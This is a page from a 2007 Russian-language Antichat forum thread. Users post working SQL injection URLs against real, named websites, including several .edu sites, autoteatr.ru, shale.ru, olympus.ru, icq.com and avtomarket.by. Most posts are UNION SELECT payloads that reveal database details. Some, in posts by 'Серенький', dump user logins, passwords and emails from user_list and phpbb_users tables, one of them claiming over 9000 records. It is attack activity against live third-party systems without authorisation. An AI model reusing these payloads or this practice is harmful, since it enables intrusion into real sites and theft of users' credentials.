ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2291  
Старый 26.05.2007, 19:55
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

Вот ещё .edu
Код:
http://rpitv.union.rpi.edu/news.php?newsid=-5+union+select+version(),2,3,4/*
http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,3,4/*
 
Ответить с цитированием

  #2292  
Старый 26.05.2007, 20:35
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Показал бы хоть что умеешь выводить =\
Код:
http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,convert(concat_ws(char(58),user(),version(),database()+using+latin1),4/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

sql
  #2293  
Старый 26.05.2007, 22:09
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Цитата:
http://www.shale.ru/page.php?lev1=-7+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,us ername,user_password,user_email),7,8,9,0+from+phpb b_users/*
9000+ записей
 
Ответить с цитированием

  #2294  
Старый 27.05.2007, 15:39
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
Провел на форуме:
383436

Репутация: 68
Отправить сообщение для XenOtai с помощью ICQ
По умолчанию

Код:
http://www.olympus.ru/customers/manuals/'-1+union+select+1,2,3/*
 
Ответить с цитированием

  #2295  
Старый 27.05.2007, 16:00
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

Цитата:
http://www.olympus.ru/customers/manuals/'-1+union+select+1,2,3/*
=>
Цитата:
http://hlamidnik.h18.ru/SQLS.html
 
Ответить с цитированием

  #2296  
Старый 27.05.2007, 17:03
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

Блин, .edu уже кажись кончаются!
Код:
http://www.leiden.edu/students/index.php3?c=-46+union+select+version()/*
 
Ответить с цитированием

  #2297  
Старый 27.05.2007, 17:16
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

первая моя нормальная скуля ))
Цитата:
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11, 12,13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12, 13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11 ,12,13/*
Токо я больше ничего сделать не смог ))
 
Ответить с цитированием

  #2298  
Старый 27.05.2007, 17:17
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

вот инъекция на icq.com, но использовать ее не получится, т.к. там стоит ограничение на количество знаков, но факт в том, что инъекция есть
Код:
http://www.icq.com/boards/view_posts.php?uin=261634063-1
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

cont
  #2299  
Старый 27.05.2007, 17:55
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow cont

Цитата:
первая моя нормальная скуля ))
Цитата:http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11, 12,13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12, 13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11 ,12,13/*



Токо я больше ничего сделать не смог ))
NOmeR1, гляди

есть таблицы: user_list (login,pwd,email,admin)
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,concat_ws(0x3a,login,pwd,email ,admin),3,4,5,6,7,8,9,10,11,12,13+from+user_list+l imit+0,1/*

причем пароли открытые)

phpbb_users со всеми вытекающими.. (username,user_password и т.д.)
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,concat_ws(0x3a,user_id,usernam e,user_password,user_email),3,4,5,6,7,8,9,10,11,12 ,13+from+phpbb_users+limit+1,1/*

зы. ищи внимательней

Последний раз редактировалось Серенький; 27.05.2007 в 17:59..
 
Ответить с цитированием

  #2300  
Старый 27.05.2007, 18:01
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Сайт по сути большая доска объявлений о продаже автомобилей:
Цитата:
http://avtomarket.by/showtransdetail.php?id=9999+union+select+1,concat( user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT.XYZ